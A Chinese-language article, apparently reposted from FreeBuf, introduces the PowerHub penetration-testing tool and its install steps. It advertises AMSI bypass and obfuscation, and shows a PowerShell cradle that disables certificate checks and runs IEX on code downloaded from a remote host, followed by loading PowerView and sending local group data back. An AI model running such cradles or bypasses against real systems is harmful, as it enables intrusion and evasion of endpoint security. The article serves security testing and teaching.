PowerHub是一款基于Web应用程序的渗透测试数据传输与端点管理工具,该工具可以帮助渗透测试人员传输数据,尤其是那些被端点保护标记的代码。
1、无文件;
2、无状态;
3、证书绑定;
4、通过 RC4 加密对字符串进行“混淆”;
5、支持AMSI旁路;
6、支持用于内存中执行 C# 程序的透明别名;
PowerShell
Python 3
由于该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好最新版本的Python 3环境。
源码获取
广大研究人员可以直接使用下列命令将该项目源码克隆至本地:
git clone https://github.com/AdrianVollmer/PowerHub.git
PyPI安装(建议)
PowerHub现已托管在了PyPI上,我们可以像安装其他 Python 包一样安装它:
python3 -m pip install powerhub
如需构建二进制Payload,则需要 MinGW GCC 和 Mono C# 编译器。在类似 Debian 的系统上,可以使用下列命令安装它们:
apt-get install mono-mcs gcc-mingw-w64-x86-64 gcc-mingw-w64-i686
安装后,~/.local/bin中将出现两个新的可执行文件:
powerhub
power-obfuscate
接下来,运行下列命令即可:
powerhub <CALLBACK HOST> --auth powerhub:<PASSWORD><CALLBACK HOST><PASSWORD>https://<CALLBACK HOST>:8443
获取有关本地组的信息并将其传回:
PS C:Usersavollmer> [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Nxois='bZeVBC4vZfakT5SmCcaFam6IRY6UNLnC';$Plukgmio=New-Object Net.WebClient;IEX $Plukgmio.DownloadString('https://192.168.11.2:8443/')
_____ _____ _ _ _ _______ ______ _ _ _ _ ______
|_____] | | | | | |______ |_____/ |_____| | | |_____]
| |_____| |__|__| |______ | _ | | |_____| |_____]
Run 'Help-PowerHub' for help
PS C:Usersavollmer> Get-HubModule PowerView
Name : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1
Type : ps1
N : 205
Loaded : True
Alias :
PS C:Usersavollmer> Get-LocalGroup | PushTo-Hub -Name groups.json
本项目的开发与发布遵循MIT开源许可协议。
PowerHub:
https://github.com/AdrianVollmer/PowerHub
原文始发于微信公众号(FreeBuf):PowerHub:一款基于Web的渗透测试数据传输与端点管理工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论